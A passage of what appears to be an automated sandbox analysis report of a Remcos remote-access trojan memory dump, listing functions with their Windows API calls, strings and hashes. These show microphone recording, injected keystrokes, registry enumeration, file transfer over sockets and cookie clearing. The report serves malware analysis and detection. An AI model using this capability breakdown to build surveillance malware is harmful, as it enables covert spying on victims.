                                  • Opcode Fuzzy Hash: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                  • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                  Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentProcess
                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                  • API String ID: 2050909247-4242073005
                                  • Opcode ID: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                  • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                  • Opcode Fuzzy Hash: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                  • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                  Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • _strftime.LIBCMT ref: 00401D50
                                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                  • API String ID: 3809562944-243156785
                                  • Opcode ID: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                  • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                  • Opcode Fuzzy Hash: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                  • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                  Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                  • int.LIBCPMT ref: 00410EBC
                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                  • String ID: ,kG$0kG
                                  • API String ID: 3815856325-2015055088
                                  • Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                  • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                  • Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                  • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                  Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                  • waveInStart.WINMM ref: 00401CFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                  • String ID: dMG$|MG$PG
                                  • API String ID: 1356121797-532278878
                                  • Opcode ID: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                  • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                  • Opcode Fuzzy Hash: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                  • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                  Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                  • String ID: Remcos
                                  • API String ID: 1970332568-165870891
                                  • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                  • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                  • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                  • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                  Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                  • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                  Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                  • __freea.LIBCMT ref: 00454083
                                  • __freea.LIBCMT ref: 0045408F
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                  • String ID:
                                  • API String ID: 3256262068-0
                                  • Opcode ID: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                  • Opcode Fuzzy Hash: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                  Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                  • _free.LIBCMT ref: 00445515
                                  • _free.LIBCMT ref: 0044552E
                                  • _free.LIBCMT ref: 00445560
                                  • _free.LIBCMT ref: 00445569
                                  • _free.LIBCMT ref: 00445575
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorLast$_abort_memcmp
                                  • String ID: C
                                  • API String ID: 1679612858-1037565863
                                  • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                  • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                  Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: tcp$udp
                                  • API String ID: 0-3725065008
                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                  Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                  • ExitThread.KERNEL32 ref: 004018F6
                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                  • String ID: PkG$XMG$NG$NG
                                  • API String ID: 1649129571-3151166067
                                  • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                  • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                  • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                  • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                  Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                  • String ID: .part
                                  • API String ID: 1303771098-3499674018
                                  • Opcode ID: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                  • Opcode Fuzzy Hash: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                  Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendInput.USER32 ref: 00419A25
                                  • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InputSend$Virtual
                                  • String ID:
                                  • API String ID: 1167301434-0
                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                  Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16_free
                                  • String ID: a/p$am/pm$h{D
                                  • API String ID: 2936374016-2303565833
                                  • Opcode ID: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                  • Opcode Fuzzy Hash: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                  Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                  • _free.LIBCMT ref: 00444E87
                                  • _free.LIBCMT ref: 00444E9E
                                  • _free.LIBCMT ref: 00444EBD
                                  • _free.LIBCMT ref: 00444ED8
                                  • _free.LIBCMT ref: 00444EEF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$AllocHeap
                                  • String ID: KED
                                  • API String ID: 1835388192-2133951994
                                  • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                  • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                  Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Enum$InfoQueryValue
                                  • String ID: [regsplt]$xUG$TG
                                  • API String ID: 3554306468-1165877943
                                  • Opcode ID: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                  • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                  • Opcode Fuzzy Hash: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                  • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                  Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                    • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                    • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumInfoOpenQuerysend
                                  • String ID: xUG$NG$NG$TG
                                  • API String ID: 3114080316-2811732169
                                  • Opcode ID: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                  • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                  • Opcode Fuzzy Hash: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                  • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                  Function 004511AC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,000000FF,00000001,0043F918,?), ref: 004511F9
                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451294
                                  • __freea.LIBCMT ref: 0045129D
                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                  • String ID: PkGNG
                                  • API String ID: 1857427562-263838557
                                  • Opcode ID: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                  • Opcode Fuzzy Hash: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                  Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                  • _wcslen.LIBCMT ref: 0041B7F4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                  • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                  • API String ID: 37874593-122982132
                                  • Opcode ID: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                  • Opcode Fuzzy Hash: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                  Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                    • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                    • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                  • API String ID: 1133728706-4073444585
                                  • Opcode ID: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                  • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
